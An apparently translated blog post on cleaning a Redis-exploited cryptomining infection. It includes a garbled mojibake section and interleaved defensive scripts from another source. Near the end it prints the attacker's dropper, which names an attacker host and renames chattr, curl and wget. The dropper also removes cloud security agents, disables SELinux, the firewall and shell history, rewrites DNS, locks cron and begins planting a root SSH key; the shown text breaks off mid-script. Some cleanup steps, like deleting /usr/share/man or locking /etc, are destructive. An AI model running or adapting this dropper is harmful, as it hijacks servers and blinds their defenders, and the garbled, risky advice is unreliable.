Server hijacked for cryptomining (script-file attack) (hoping this post solves your problem)

The server was attacked, and if it was not cleaned up it was going to be restricted.
I read a lot of material to deal with it, since I had only just started with servers and knew nothing.
Checking with the command below showed that something was indeed being started on a schedule:
vim /var/log/cron

It matched the error reported in the console.

This kind of thing is usually a matter of exposed ports. At first I thought it was Docker and closed Docker's ports, but what I read online said it is more likely Redis, or some other port, that was left without any security configuration.
Pay close attention to ports; getting turned into a mining rig is a real hassle.
At this point you can try closing the Redis port. What I did was
check Redis first.

Enter Redis. First you need to know where your Redis is installed:
whereis redis-cli

Once there, run
redis-cli -p 6379
to enter Redis.

Check whether your Redis has a password configured.

If it does not, a script can very easily get into your server from here:
it uses curl to download a .sh file, runs it, and you are done for.
Set a Redis password (temporary; the permanent way is below):
config set requirepass ************
Set it,
and once you exit, operating without authenticating is no longer possible.

But this method is temporary; it is lost again after a restart.
So configure it in the config file instead.
Find redis.conf


and edit it.
In the editor you can search with /requirepass foobared
to jump to the right place, then
requirepass *******
is all you need.
Restart Redis:
systemctl restart redis.service
systemctl status redis   to check the status
Check whether the configuration took effect:
as before, go to the directory and log in to Redis,
enter get key*
and find that it is refused.

So log in:
auth ******   (the password you just set)
The output is OK,
and Redis can be used normally again.

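As an added check (not from the original post), the following script audits a redis.conf for the settings discussed here: an empty requirepass, a wildcard bind, and protected-mode switched off, plus whether the CONFIG command (the one a remote client uses to write files through Redis) has been renamed. It assumes POSIX sh with awk and grep; the sample config at the bottom is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): audit a redis.conf for the
# settings that let an unauthenticated network client reach the instance.
# Assumes POSIX sh, awk and grep; the sample config below is constructed.

# redis_effective FILE DIRECTIVE
# Print the effective value of DIRECTIVE: the last non-comment occurrence
# wins, as in redis-server itself. Empty output means "not set".
redis_effective() {
    awk -v key="$2" '
        $1 == key { $1 = ""; sub(/^ +/, ""); val = $0 }
        END { print val }' "$1"
}

# audit_redis_conf FILE
# Print one finding per line (WEAK, OK or INFO); return 1 if anything is weak.
audit_redis_conf() {
    conf=$1
    weak=0
    port=$(redis_effective "$conf" port)
    pass=$(redis_effective "$conf" requirepass)
    bind=$(redis_effective "$conf" bind)
    pmode=$(redis_effective "$conf" protected-mode)

    case "$pass" in
        "")       echo "WEAK requirepass not set: anyone reaching port ${port:-6379} has full access"; weak=1 ;;
        foobared) echo "WEAK requirepass is the placeholder value from the sample config"; weak=1 ;;
        *)        echo "OK   requirepass is set" ;;
    esac

    case "$bind" in
        "")              echo "WEAK bind not set: Redis listens on every interface"; weak=1 ;;
        *0.0.0.0*|*"*"*) echo "WEAK bind includes a wildcard address: $bind"; weak=1 ;;
        *)               echo "OK   bind restricted to: $bind" ;;
    esac

    if [ "$pmode" = "no" ]; then
        echo "WEAK protected-mode no: unauthenticated remote clients are accepted"
        weak=1
    else
        echo "OK   protected-mode ${pmode:-yes (default)}"
    fi

    # CONFIG SET dir/dbfilename is how a Redis write becomes a file on disk
    # (authorized_keys, a cron entry); renaming CONFIG limits that even if a
    # client does get in.
    if grep -Eq '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$conf"; then
        echo "OK   CONFIG command renamed or disabled"
    else
        echo "INFO CONFIG command still available under its default name"
    fi
    return $weak
}

# Constructed sample: the kind of config that lets the script in the post walk in.
weak_conf=$(mktemp)
cat > "$weak_conf" <<'EOF'
# requirepass foobared
port 6379
bind 0.0.0.0
protected-mode no
EOF
audit_redis_conf "$weak_conf" || echo "-> weak settings found, fix before restarting"
rm -f "$weak_conf"
```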
At this point I planned to reboot the server to see whether it would still be mining, but I already knew the answer: the attacker had come in through the exposed interface and had finished setting up the miner, so a reboot was not going to stop it.
In the root directory, use ll -rta
to see which files were modified (the script ran around 10 o'clock on 9.25).

Try to pick a window close to the date of the incident; files whose timestamps differ by months or years can be ignored.
Carefully check /home, /root and similar places.
I found the problem first in /root.

There I saw files whose 9.25 timestamps were exactly identical,
including authorized_keys, which is used for passwordless login.
So I started deleting.

Then clear its attributes; at bottom these are just system permission settings, so it does no harm.

So I wanted to use chattr to change the file attributes.
Result: chattr: command not found
The script had uninstalled it. Great.
If yours is still there, you can skip this step (everything down to the closing brace). {
Install chattr:
yum install e2fsprogs
Usually the package is still there, not uninstalled,
so it can be used to install directly.

chattr itself belongs to e2fsprogs.

And then, wouldn't you know it, another problem:
Failed to set locale, defaulting to C.UTF-8
Installation failed.
What I found says this is caused by the environment not being set up;
run the locale command.

The fix is to run the following commands; after that locale no longer complains:

echo "export LC_ALL=en_US.UTF-8" >> /etc/profile
source /etc/profile
Now continue installing.

Still no good:
chattr is still command not found.
I tried to find chattr, because some blogs say chattr may have been moved elsewhere.
Switch to the root directory first, then run the search; from other subdirectories you may not find it:
find -name chattr
It also turned up a long run of errors under /proc along the way.
Roughly this appeared:
find -name chattr
./var/lib/docker/overlay2/4362bde84fd652a9ab41989c1d6b5d688cb0d1345172265c142adb8cc776447c/diff/bin/chattr
./var/lib/docker/overlay2/8be99b28e5bc86f6d2158ca963df6ecac6a41e4b95a0e62f219f3bd2cebc14d3/diff/usr/bin/chattr
./var/lib/docker/overlay2/196f754ebc38c60aff435c92f2548d6808352eaf079d36cc5df49c592e2828be/diff/usr/bin/chattr
./var/lib/docker/overlay2/0b23070518ea4281899c2c772c207cb20c219330533d98fcaf930c90d72cdac9/diff/usr/bin/chattr
./var/lib/docker/overlay2/7a5f30a6ef8e0cc88330533f26f0c3bcc2f9ee85a850e27a726b74e48bcd0f5d/diff/usr/bin/chattr
./var/lib/docker/overlay2/1eadf06a371819054f343753563ecb36ce6fe4e1da9afd0b3fdd4aff15aeb883/diff/usr/bin/chattr
Then I figured I could start from here; there was definitely something wrong.
First I went to the ./var/lib/docker directory and deleted overlay2/ outright,
clearing it.
Tried again; yum said it was already installed.
So I figured yum was not going to work.
Then I would remove those packages first, download the package from the official site, and unpack it to see whether it works.
Process:
yum remove e2fsprogs
Removed successfully.

Find the tar.gz package yourself; no link here, a Bilibili issue.

Upload it to the server.
I put it under /opt, then unpacked it:
tar -xzvf e2fsprogs-1.46.5.tar.gz
Unpacking finished; it took a while because memory and CPU were maxed out.

Then enter the folder.

Compile:
./configure

make
make install
Installation done.
(If errors appear during compilation, search for them yourself; usually it is missing environment dependencies, so download them or use another method.)
That is it.
Test:

If you got here successfully, chattr should be installed.
It did not install successfully for me. Great. Keep looking for a method.
I found another method in a blog and kept experimenting:
download the chattr.c file and upload it to the server.
The file is at https://github.com/posborne/linux-programming-interface-exercises/chattr.c

Delete everything related to chattr and e2fsprogs,
for example /usr/bin/chattr.
You can use whereis chattr to see where they are, then delete them.
yum install e2fsprogs   to download it again.
Now chattr works.

Then delete those things.

}
chattr -ia filename
chattr -i filename
Strip whatever attributes it has.
Next, deal with the mining virus files crypto and pnscan.
Under the /usr/share directory
you can see the crypto file.
Delete it and everything related.

To be safe, run whereis crypto.
It shows

and points to /usr/share/man.
By now I wanted to delete the whole man folder.
Use lsattr to look at man's attributes;
it has the e attribute.

rm -rf man   to delete it.
Now look for pnscan's files.


Delete directly:
rm -rf pnscan
The files are deleted.
Now look at the processes.
Stop the ssh, python and similar processes first.
Then delete every folder with the ia attributes.
Files under /etc/:
(cron.d, crontab)

/var/spool/  :


No high-CPU process shows up.
That means either top is broken or the process is deliberately hidden.
If you suspect top, use lsattr or other commands to check whether it has been tampered with,
or install htop to look at CPU and the other parameters.
But with htop I still could not see it.
So this virus needs a closer look:
netstat -anp
shows that another program really is running, with the process name -
Action:
cat /etc/ld.so.preload
Output:


Because there are many .so files in this directory and I do not understand them, for now I only deleted the files listed in that output.
rm -rf '[cmake].so'   result: Operation not permitted. The more it refuses, the more certain it is that this file is the problem.
chattr -i '[cmake]'.so


Clean up /etc/ld.so.preload.
Here I planned to delete these files first.

An error was raised during deletion;
shown here:

Change the attributes of the ld.so.preload file (mine had the i attribute).
Then run the following.
Quoted:
(the blog is at https://blog.csdn.net/zhanghenan123/article/details/88718898)
echo "" > /etc/ld.so.preload
chattr +i /etc
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
chattr +i /var/spool/cron/
rm -f /usr/local/lib/lbb.so
chattr +i /usr/local/lib
killall kworkerds
rm -f /var/tmp/kworkerds*
rm -f /var/tmp/1.so
rm -f /tmp/kworkerds*
rm -f /tmp/1.so
rm -f /var/tmp/wc.conf
rm -f /tmp/wc.conf
Basically this deletes things and then locks them so they cannot be modified.

The error in the middle was because I had already deleted the parent directory of one of these files earlier.
/etc/rc.d/   delete the rc.d-related files under etc too; things that resist deletion like this are generally the virus.


現(xiàn)在適應(yīng)top來看一下
已經(jīng)能定位到這個(gè)命令了

繼續(xù)加油!
到這里其實(shí)很明朗了,pid該病毒是隨機(jī)分配的,然后命令式【cmake】
以及masscan也要注意一下
那么使用ps -ef | grep pid 來看一下文件的位置
然后定位到文件位置
查看一下
執(zhí)行刪除
rm -rf cmake
rm -rf cmake.pid 文件
相關(guān)的都刪除了

害怕有隱藏文件
果然,在本來ls 展示出來的文件中并沒有這個(gè)


以及這個(gè)..lph/

里面的創(chuàng)建時(shí)間是9.25 與入侵時(shí)間一致
那么我刪除
rm -rf ..lph/
查一下httpd

/bin/bash? 我沒有發(fā)現(xiàn)設(shè)么問題
/etc/.hjttpd/.../下面我發(fā)現(xiàn)了問題

注意這里ls? 的話看其來沒有東西,建議使用ls -a來看一下隱藏文件,好家伙,有很多,我第一反應(yīng)是直接刪了

rm -rf .../ 還不讓刪除

top命令
kill --9 pid (去殺死有關(guān)httpd的東西)
kill -9 所有cpu占據(jù)高的進(jìn)程
OK到這里已經(jīng)完成
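Added example, not from the original post: a single triage pass over the places cleaned by hand above (ld.so.preload, dot-dot directories such as ..lph, cron entries that download from the network, the contents of authorized_keys, immutable flags, and the renamed chattr/wget/curl copies that the dropper printed at the end of the post leaves behind). It takes a root directory, so it can run against a mounted image as well as a live host; the demo tree at the bottom is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): one pass over the persistence and
# hiding spots the post cleaned by hand. ROOT is the filesystem to inspect, so it
# works on a mounted disk image or a constructed test tree as well as on / of a
# live host. Assumes POSIX sh, find, grep and awk; lsattr is optional.

# triage_scan ROOT -> "kind<TAB>detail" lines, one per finding
triage_scan() {
    root=${1%/}

    # 1. LD_PRELOAD hijack: every library listed here is injected into each new
    #    dynamically linked process; this is what kept [cmake] out of top/htop.
    if [ -s "$root/etc/ld.so.preload" ]; then
        grep -v '^[[:space:]]*$' "$root/etc/ld.so.preload" | awk '{ print "ld.so.preload\t" $0 }'
    fi

    # 2. Directory names built to vanish from a plain ls: ..lph, ..hide, "..."
    for base in usr/share etc tmp var/tmp; do
        [ -d "$root/$base" ] || continue
        find "$root/$base" -type d -name '..?*' 2>/dev/null |
            awk -v r="$root" '{ print "hidden-dir\t" substr($0, length(r) + 1) }'
    done

    # 3. Cron entries that fetch and run something from the network
    #    (curl/wget, or the renamed copies wls/cls the dropper creates).
    for d in etc/cron.d var/spool/cron etc/crontab; do
        [ -e "$root/$d" ] || continue
        grep -rlE '(curl|wget|wls|cls)[^|]*https?://' "$root/$d" 2>/dev/null |
            awk -v r="$root" '{ print "cron-download\t" substr($0, length(r) + 1) }'
    done

    # 4. Every authorized SSH key with its comment, so an unknown one
    #    (the dropper plants root@puppetserver) stands out.
    for k in "$root"/root/.ssh/authorized_keys* "$root"/home/*/.ssh/authorized_keys*; do
        [ -f "$k" ] || continue
        awk -v f="${k#$root}" 'NF >= 2 && $1 !~ /^#/ {
            print "ssh-key\t" f "\t" (NF >= 3 ? $NF : "(no comment)") }' "$k"
    done

    # 5. Tools the dropper renames so that cleanup commands fail:
    #    chattr -> zzhcht, wget -> wls, curl -> cls.
    for b in zzhcht wls cls; do
        for dir in bin usr/bin; do
            if [ -x "$root/$dir/$b" ]; then printf 'renamed-tool\t/%s/%s\n' "$dir" "$b"; fi
        done
    done

    # 6. Immutable (i) or append-only (a) flags on files that should never carry
    #    them; only when lsattr exists, silently skipped where unsupported.
    if command -v lsattr >/dev/null 2>&1; then
        for p in etc/ld.so.preload etc/crontab root/.ssh/authorized_keys etc/resolv.conf; do
            [ -f "$root/$p" ] || continue
            flags=$(lsattr -d "$root/$p" 2>/dev/null | awk '{ print $1 }')
            case "$flags" in *i*|*a*) printf 'immutable\t/%s\t%s\n' "$p" "$flags" ;; esac
        done
    fi
    return 0
}

# triage_persistence ROOT -> prints the findings; returns 0 if clean, 1 otherwise
triage_persistence() {
    findings=$(triage_scan "$1")
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Constructed demo tree with the two hidden directories and the preload entry the post found.
demo=$(mktemp -d)
mkdir -p "$demo/usr/share/..lph" "$demo/etc/.hjttpd/..."
printf '/usr/share/[cmake].so\n' > "$demo/etc/ld.so.preload"
triage_persistence "$demo" || echo "-> host needs cleanup"
rm -rf "$demo"
```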


Finally, here is the script for everyone's reference,
to make research easier, because studying the script itself is the best way to get to the root of what happened to the server.
#!/bin/bash
##variables
domain=205.185.118.246
mainurl=http://$domain/b2f628/
proxyport=1414
#init environment
m_command()
{
if [ -x /bin/chattr ];then
    mv /bin/chattr /bin/zzhcht
elif [ -x /usr/bin/chattr ];then
    mv /usr/bin/chattr /usr/bin/zzhcht
fi
if [ -x /bin/zzhcht ];then
    export CHATTR=/bin/zzhcht
elif [ -x /usr/bin/zzhcht ];then
    export CHATTR=/usr/bin/zzhcht
else
    export CHATTR=chattr
fi
if [ -f /bin/curl ];then
    export CURL_CMD="/bin/curl"
elif [ -f /usr/bin/curl ];then
    export CURL_CMD="/usr/bin/curl"
fi
if [ -f /bin/wget ];then
    export WGET_CMD="/bin/wget"
elif [ -f /usr/bin/wget ];then
    export WGET_CMD="/usr/bin/wget"
fi
if [ -x "/usr/bin/wge" -o -x "/bin/wge" ];then
    if [ -f /bin/wge ];then
        export WGET_CMD="/bin/wge"
    elif [ -f /usr/bin/wge ];then
        export WGET_CMD="/usr/bin/wge"
    fi
    mv /bin/wge /bin/wls || mv /usr/bin/wge /usr/bin/wls
fi
if [ -x "/usr/bin/wd1" -o -x "/bin/wd1" ];then
    if [ -f /usr/bin/wd1 ];then
        export WGET_CMD="/usr/bin/wd1"
    elif [ -f /bin/wd1 ];then
        export WGET_CMD="/bin/wd1"
    fi
    mv /bin/wd1 /bin/wls || mv /usr/bin/wd1 /usr/bin/wls
fi
if [ -x "/usr/bin/wget1" -o -x "/bin/wget1" ];then
    if [ -f /bin/wget1 ];then
        export WGET_CMD="/bin/wget1"
    elif [ -f /usr/bin/wget1 ];then
        export WGET_CMD="/usr/bin/wget1"
    fi
    mv /bin/wget1 /bin/wls || mv /usr/bin/wget1 /usr/bin/wls
fi
if [ -x "/usr/bin/wdt" -o -x "/bin/wdt" ];then
    if [ -f /bin/wdt ];then
        export WGET_CMD="/bin/wdt"
    elif [ -f /usr/bin/wdt ];then
        export WGET_CMD="/usr/bin/wdt"
    fi
    mv /bin/wdt /bin/wls || mv /usr/bin/wdt /usr/bin/wls
fi
if [ -x "/usr/bin/wdz" -o -x "/bin/wdz" ];then
    if [ -f /usr/bin/wdz ];then
        export WGET_CMD="/usr/bin/wdz"
    elif [ -f /bin/wdz ];then
        export WGET_CMD="/bin/wdz"
    fi
    cp /bin/wdz /bin/wls || cp /usr/bin/wdz /usr/bin/wls
fi
if [ -x "/usr/bin/xget" -o -x "bin/xget" ];then
    if [ -f /bin/xget ];then
        export WGET_CMD="/bin/xget"
    elif [ -f /usr/bin/xget ];then
        export WGET_CMD="/usr/bin/xget"
    fi
    mv /bin/xget /bin/wls || /usr/bin/xget /usr/bin/wls
fi
if [ -x "/bin/wls" ];then
    export WGET_CMD="/bin/wls"
elif [ -x "/usr/bin/wls" ];then
    export WGET_CMD="/usr/bin/wls"
else
    if [ $(command -v yum) ];then
        rpm -e --nodeps wget
        yum remove -y wget
        yum install -y wget
    else
        apt-get remove -y wget
        apt-get install -y wget
    fi
    mv /bin/wget /bin/wls || mv /usr/bin/wget /usr/bin/wls
    if [ -f /bin/wls ];then
        export WGET_CMD="/bin/wls"
    elif [ -f /usr/bin/wls ];then
        export WGET_CMD="/usr/bin/wls"
    fi
fi
if [ -x "/usr/bin/cd1" -o -x "/bin/cd1" ];then
    if [ -f /bin/cd1 ];then
        export CURL_CMD="/bin/cd1"
    elif [ -f /usr/bin/cd1 ];then
        export CURL_CMD="/usr/bin/cd1"
    fi
    mv /bin/cd1 /bin/cls || mv /usr/bin/cd1 /usr/bin/cls
fi
if [ -x "/usr/bin/curl" -o -x "/bin/curl" ];then
    if [ -f /bin/curl ];then
        export CURL_CMD="/bin/curl"
    elif [ -f /usr/bin/curl ];then
        export CURL_CMD="/usr/bin/curl"
    fi
    mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls
fi
if [ -x "/usr/bin/cdz" -o -x "/bin/cdz" ];then
    if [ -f /bin/cdz ];then
        export CURL_CMD="/bin/cdz"
    elif [ -f /usr/bin/cdz ];then
        export CURL_CMD="/usr/bin/cdz"
    fi
    cp /bin/cdz /bin/cls || cp /usr/bin/cdz /usr/bin/cls
fi
if [ -x "/usr/bin/cur" -o -x "/bin/cur" ];then
    if [ -f /bin/cur ];then
        export CURL_CMD="/bin/cur"
    elif [ -f /usr/bin/cur ];then
        export CURL_CMD="/usr/bin/cur"
    fi
    mv /bin/cur /bin/cls || mv /usr/bin/cur /usr/bin/cls
fi
if [ -x "/usr/bin/TNTcurl" -o -x "/bin/TNTcurl" ];then
    if [ -f /bin/TNTcurl ];then
        export CURL_CMD="/bin/TNTcurl"
    elif [ -f /usr/bin/TNTcurl ];then
        export CURL_CMD="/usr/bin/TNTcurl"
    fi
    mv /bin/TNTcurl /bin/cls || mv /usr/bin/TNTcurl /usr/bin/cls
fi
if [ -x "/usr/bin/curltnt" -o -x "/bin/curltnt" ];then
    if [ -f /bin/curltnt ];then
        export CURL_CMD="/bin/curltnt"
    elif [ -f /usr/bin/curltxt ];then
        export CURL_CMD="/usr/bin/curltnt"
    fi
    mv /bin/curltnt /bin/cls || mv /usr/bin/curltnt /usr/bin/cls
fi
if [ -x "/usr/bin/curl1" -o -x "/bin/curl1" ];then
    if [ -f /bin/curl1 ];then
        export CURL_CMD="/bin/curl1"
    elif [ -f /usr/bin/curl1 ];then
        export CURL_CMD="/usr/bin/curl1"
    fi
    mv /bin/curl1 /bin/cls || mv /usr/bin/curl1 /usr/bin/cls
fi
if [ -x "/usr/bin/cdt" -o -x "/bin/cdt" ];then
    if [ -f /bin/cdt ];then
        export CURL_CMD="/bin/cdt"
    elif [ -f /usr/bin/cdt ];then
        export CURL_CMD="/usr/bin/cdt"
    fi
    mv /bin/cdt /bin/cls || mv /usr/bin/cdt /usr/bin/cls
fi
if [ -x "/usr/bin/xcurl" -o -x "/bin/xcurl" ];then
    if [ -f /bin/xcurl ];then
        export CURL_CMD="/bin/xcurl"
    elif [ -f /usr/bin/xcurl ];then
        export CURL_CMD="/usr/bin/xcurl"
    fi
    mv /bin/xcurl /bin/cls || mv /usr/bin/xcurl /usr/bin/wls
fi
if [ -x "/usr/bin/cls" ];then
    export CURL_CMD="/usr/bin/cls"
elif [ -x "/bin/cls" ];then
    export CURL_CMD="/bin/cls"
else
    if [ $(command -v yum) ];then
        rpm -e --nodeps curl
        yum remove curl
        yum install -y curl
    else
        apt-get remove curl
        apt-get install -y curl
    fi
    mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls
    if [ -f /bin/cls ];then
        export CURL_CMD="/bin/cls"
    elif [ -f /usr/bin/cls ];then
        export CURL_CMD="/usr/bin/cls"
    fi
fi
}
yum_ins()
{
yum clean all
for pkg in gcc make kmod net-tools "kernel-devel-uname-r == $(uname -r)"
do
yum install -y $pkg
done
}
apk_ins()
{
apk update
for pkg in gcc make kmod linux-headers net-tools
do
apk add $pkg
done
}
apt_ins()
{
apt update --fix-missing
for pkg in gcc make kmod net-tools linux-headers-$(uname -r)
do
apt-get install -y $pkg
done
}
ins_package()
{
if
type apk 2>/dev/null 1>/dev/null;
then
apk_ins
fi
if
type apt 2>/dev/null 1>/dev/null;
then
apt_ins
fi
if
type yum 2>/dev/null 1>/dev/null;
then
yum_ins
fi
}
check_exist()
{
if [ -x /usr/bin/netstat -o /bin/netstat ]
then
for pt in $(netstat -an|grep EST|grep "$proxyport"|awk '{print $5}'|awk -F ":" '{print $NF}')
do
    if [ "$pt" == "$proxyport" ];then
        echo "miner running"
        exit 1
    else
        echo "miner may not running,check next port"
    fi
done
else
    echo "haha"
fi
}
clean_monitor()
{
iptables -F
ulimit -n 65535 2>/dev/null 1>/dev/null
export LC_ALL=C
HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null
export HISTFILE=/dev/null 2>/dev/null 1>/dev/null
unset HISTFILE 2>/dev/null 1>/dev/null
shopt -ou history 2>/dev/null 1>/dev/null
set +o history 2>/dev/null 1>/dev/null
HISTSIZE=0 2>/dev/null 1>/dev/null
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
setenforce 0 2>/dev/null 1>/dev/null
echo SELINUX=disabled >/etc/selinux/config 2>/dev/null
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop apparmor 2>/dev/null 1>/dev/null ; systemctl disable apparmor 2>/dev/null 1>/dev/null ; else service apparmor stop 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null
if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis 2>/dev/null 1>/dev/null ; fi
if type ufw 2>/dev/null 1>/dev/null; then ufw disable 2>/dev/null 1>/dev/null ; fi
if type iptables 2>/dev/null 1>/dev/null; then iptables -F 2>/dev/null 1>/dev/null ; fi
sysctl kernel.nmi_watchdog=0 2>/dev/null 1>/dev/null
if [ -f "/proc/sys/kernel/nmi_watchdog" ]; then echo '0' >/proc/sys/kernel/nmi_watchdog 2>/dev/null ; fi
if [ -f "/etc/sysctl.conf" ]; then echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 2>/dev/null ; fi
if ps aux | grep -i '[a]liyun' 2>/dev/null 1>/dev/null; then
    # (two 'echo <base64> | base64 -d | bash' lines removed here: base64 blobs of agent-uninstall scripts)
    pkill aliyun-service 2>/dev/null 1>/dev/null
    if [ -f "/etc/init.d/agentwatch" ]; then rm -rf /etc/init.d/agentwatch 2>/dev/null 1>/dev/null ; fi
    if [ -f "/usr/sbin/aliyun-service" ]; then rm -fr /usr/sbin/aliyun-service 2>/dev/null 1>/dev/null ; fi
    if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis* 2>/dev/null 1>/dev/null ; fi
    if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi
    if type systemctl 2>/dev/null 1>/dev/null; then systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else if [ -f "/etc/init.d/aliyun" ]; then rm -fr /etc/init.d/aliyun 2>/dev/null 1>/dev/null ; fi ; fi
    if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop bcm-agent 2>/dev/null 1>/dev/null ; else service bcm-agent stop 2>/dev/null 1>/dev/null ; fi
    if type yum 2>/dev/null 1>/dev/null; then yum remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi
    if type apt-get 2>/dev/null 1>/dev/null; then apt-get remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi
elif ps aux | grep -i '[y]unjing' 2>/dev/null 1>/dev/null; then
if [ -f "/usr/local/qcloud/stargate/admin/uninstall.sh" ]; then /usr/local/qcloud/stargate/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/local/qcloud/YunJing/uninst.sh" ]; then /usr/local/qcloud/YunJing/uninst.sh 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/local/qcloud/monitor/barad/admin/uninstall.sh" ]; then /usr/local/qcloud/monitor/barad/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi
fi
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
if ps aux | grep -i '[a]liyun'; then
  ${CURL_CMD} http://update.aegis.aliyun.com/download/uninstall.sh | bash
  ${CURL_CMD} http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
  /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
  if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 ]; then
    /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 stop && /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 uninstall && rm -rf /usr/local/cloudmonitor
  else
    echo "ali cloud monitor not running"
? fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
}
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
clmo() {
if ps aux | grep -i '[a]liyun'; then
echo "this is ali cloud"
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
until [ "$number" -eq 0 ]; do
systemctl stop aliyun
systemctl stop aegis
ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
done
while [ -d /usr/local/aegis ]
do
ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP
path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')
num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)
if [ $num -gt 0 ]
then
echo "$path" exist
$path --stopdriver
else
echo "no AliSecGuard process"
fi
rm -rf /usr/local/aegis
done
else
echo "it's not ali cloud"
fi
}
function clean_cron(){
${CHATTR} -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
${CHATTR} -ia /etc/crontab
tntrecht -ia /etc/crontab
${CHATTR} -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
${CHATTR} -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
function lock_cron()
{
${CHATTR} -R +ia /var/spool/cron
touch /etc/crontab
${CHATTR} +ia /etc/crontab
${CHATTR} -R +ia /var/spool/cron/crontabs
${CHATTR} -R +ia /etc/cron.d
}
function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q root@puppetserver /root/.ssh/authorized_keys || ${CHATTR} -ia /root/.ssh/authorized_keys;
